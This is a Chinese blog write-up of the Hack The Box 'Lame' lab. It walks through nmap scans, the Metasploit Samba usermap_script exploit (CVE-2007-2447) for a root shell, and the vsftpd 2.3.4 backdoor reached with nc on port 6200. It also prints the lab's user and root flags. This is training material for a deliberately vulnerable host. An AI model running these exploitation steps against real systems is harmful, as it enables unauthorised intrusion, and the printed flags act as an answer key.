首页 > 其他分享 >HTB:Lame[WriteUP]

HTB:Lame[WriteUP]

时间:2024-10-13 18:21:02浏览次数:7  
标签:HTB Lame nmap WriteUP makis VSFTPd IP 靶机 root

目录

连接至HTB服务器并启动靶机

1.How many of the nmap top 1000 TCP ports are open on the remote host?

2.What version of VSFTPd is running on Lame?

3.There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?

4.What version of Samba is running on Lame? Give the numbers up to but not including "-Debian".

5.What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf?

6.Exploiting CVE-2007-2447 returns a shell as which user?

列举tmp共享中的所有文件

7.Submit the flag located in the makis user's home directory.

USER_FLAG:f249448c9d70f706133439ab6b4e18ce

8.Submit the flag located in root's home directory.

ROOT_FLAG:01a51cb525aa507c6e1f7745bc85ab97

9.We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the boxes external IP, so they should be accessible. What must be blocking connection to these ports?

10.When the VSFTPd backdoor is trigger, what port starts listening?

利用searchsploit工具,对该漏洞exp进行搜索

11.When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?


连接至HTB服务器并启动靶机

靶机IP:10.10.10.3

分配IP:10.10.16.7


1.How many of the nmap top 1000 TCP ports are open on the remote host?

使用nmap对靶机进行前1000端口进行扫描:

nmap -p1-1000 -T4 --min-rate=1000 -sS {TARGET_IP}

由扫描结果可见,靶机开放端口:21、22、139、445共4个端口


2.What version of VSFTPd is running on Lame?

使用nmap对靶机21端口进行脚本、服务信息扫描:

nmap -p 21 -sC -sV {TARGET_IP}

由扫描结果可见,在VERSION栏目下vsftpd的版本为:2.3.4


3.There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?

启动Metasploit:

msfconsole

搜索VSFTPd 2.3.4相关漏洞信息:

search vsftpd 2.3.4

使用该漏洞利用模块:

use exploit/unix/ftp/vsftpd_234_backdoor

展示可填写选项:

show options

将靶机IP入RHOSTS选项:

set rhosts {TARGET_IP}

尝试进行漏洞利用:

exploit

可见漏洞利用失败(no),需要指定一个用户密码


4.What version of Samba is running on Lame? Give the numbers up to but not including "-Debian".

使用nmap分别对靶机139、445端口进行脚本、服务信息扫描:

nmap -p 139,445 -sC -sV {TARGET_IP}

由扫描结果可见,靶机Samba服务器版本为:3.0.20


5.What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf?

这里直接使用谷歌搜索相关漏洞:CVE-2007-2447


6.Exploiting CVE-2007-2447 returns a shell as which user?

访问靶机samba服务器列出靶机所有共享,空密码进入:

smbclient -L {TARGET_IP}

使用smbmap工具扫描各共享的权限设置:

smbmap -H {TARGET_IP}

由smbmap工具扫描结果可见,仅有tmp共享具有读写权限

列举tmp共享中的所有文件

没有敏感信息文件,只能尝试从Samba服务器版本3.0.20下手

在msfconsole下查询samba 3.0.20是否存在漏洞:

使用该模块:

use use exploit/multi/samba/usermap_script

查看该漏洞利用模块的配置参数:

show options

将靶机IP填入RHOSTS:

set rhosts {TARGET_IP}

将本机IP填入LHOST:

set lhost {NATIVE_IP}

开始漏洞利用:

exploit

可以看到当前用户为:root


7.Submit the flag located in the makis user's home directory.

查找makis目录路径:

find / -name 'makis' 2>/dev/null

进入该目录下:

cd /home/makis

列出该目录下文件:

ls

查看user.txt文件内容:

cat user.txt

USER_FLAG:f249448c9d70f706133439ab6b4e18ce


8.Submit the flag located in root's home directory.

直接查找root.txt文件路径,并查看文件内容:

cat `find / -name 'root.txt' 2>/dev/null`

ROOT_FLAG:01a51cb525aa507c6e1f7745bc85ab97


9.We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the boxes external IP, so they should be accessible. What must be blocking connection to these ports?

利用script命令切换成可交互shell:

script /dev/null -c bash

查看靶机网络连接:

netstat -tnlp

可以看到靶机的本地21端口是开放监听的,但是漏洞利用流量被防火墙拦截了(firewall)

如果需要利用这个漏洞,只能本地网络环境用户利用它进行提权


10.When the VSFTPd backdoor is trigger, what port starts listening?

直接通过谷歌搜索可知,该漏洞利用会触发vsf_sysutil_extra()函数,并打开系统的6200端口

利用searchsploit工具,对该漏洞exp进行搜索


11.When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?

运行exp脚本:

python2 49757.py {TARGET_IP}

为了方便演示提权,先将root用户切换成makis用户:

su makis -c bash

使用netcat连接靶机本地6200端口:

nc 127.0.0.1 6200

root@lame:/# su makis -c bash
makis@lame:/$ nc 127.0.0.1 6200
(UNKNOWN) [127.0.0.1] 6200 (?) : Connection refused
makis@lame:/$ nc 127.0.0.1 6200
whoami
root

成功提权到root用户

标签:HTB,Lame,nmap,WriteUP,makis,VSFTPd,IP,靶机,root
From: https://blog.csdn.net/qq_43007452/article/details/142895280

相关文章

  • HTB:Legacy[WriteUP]
    目录连接至HTB服务器并启动靶机1.HowmanyTCPportsareopenonLegacy?2.Whatisthe2008CVEIDforavulnerabilityinSMBthatallowsforremotecodeexecution?3.WhatisthenameoftheMetasploitmodulethatexploitsCVE-2008-4250?4.WhenexploitingM......
  • NewStar CTF[pwn] overwrite WriteUp
    IDA打开,查看func()函数,得到以下代码点击查看代码unsigned__int64func(){size_tinput1[6];//[rsp+Ch][rbp-84h]BYREFcharnptr[72];//[rsp+40h][rbp-50h]BYREFunsigned__int64v3;//[rsp+88h][rbp-8h]v3=__readfsqword(0x28u);printf("plsin......
  • HTB buff wp
    难度:easy初步端口扫描:开了两个端口,7680没有什么信息,8080是web服务,进去看一下,在concat.php发现版本信息searchsploit搜一下,发现payload,选用48506这个脚本修改一下脚本,不用他给的交互式shell(太难用了),在写入的php文件中加入文件上传功能,弹回来个shell,用msf收一下直接用mu......
  • jarvisoj_level2_x64 1 writeup and blog
    Hereifinishthejarvisoj_level2_x641challengeinbuuctfandhereissomewriteup......
  • NewStarCtf 2024第一周writeup
    有几道题没写出来,但还是希望能够帮到大家理解更多的CTF知识Signin操作内容:做选择题得出flag。flag值:flag{I_Agr3e_to_FoL10w_th3_ru1es_c41fa97d}MISC兑换码操作内容:题目提示flag在图片下方,010修改图片宽度,得到flag。flag值:flag{La_vaguelette}MISCLabyrinth操......
  • HACKTHEBOX——Lame
    靶机详情靶机地址:10.10.10.3攻击地址:10.10.14.10端口服务扫描先确认kali是否与靶机互通接下来使用nmap或者其他工具扫描一下靶机开放了哪些端口以及服务渗透过程根据htb中的flag提示完成前两个任务第三个任务提示VSFTPd2.3.4存在一个著名的后门,尝试使用ms......
  • HTB-TwoMillion 靶机笔记
    TwoMillion靶机笔记概述HTB上的一台liunx靶机,难度定为了简单级别,它包括了对js接口的信息收集,js反混淆,未授权,越权,命令注入等漏洞。一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--oports10.10.11.221Nmapscanreportfor10.10.11.221Hostisup(0.37s......
  • 【极客大挑战2023】- Re -点击就送的逆向题 WriteUp
    这道题给了一个.s文件解决方案有两个:1.利用gcc编译成可执行文件,然后反编译生成伪代码2.直接分析汇编(我不会。。。)1.利用gcc编译成可执行文件linux执行gcc-o1.s1IDA打开,分析并编写,注意一定要在字符串末尾加上\0结束符!!!点击查看代码#include<stdio.h>intmain(void){......
  • 【极客大挑战2023】RE方向 WriteUp
    1.砍树下载题目得到一个apk文件,jadx打开,查看Android.Manifest.xml查看MainActivity发现使用了一个I0o0I处理了输入和Syclover,猜测应该是对text处理后与Syclover对比,当result赋值为1就成功了。故查看I0o0I发现I0o0I再so文件中,故查看libezreeeee.so文件IDA打开,查找I0o0I生......
  • 极客大挑战2023-pwn-nc_pwntools WriteUp
    主要考查点Pwntools工具的基本使用方法解题思路1.nc连接题目,得到提示:根据题目,要求发送一个100长度的字符串,而且末尾需要为Sycloverb'A'*92+b'Syclover'2.发送第一个请求后进入第二步要求短时间内计算一个复杂算式,自己算是肯定不可能的,所以pwntools的recv来接收并完成......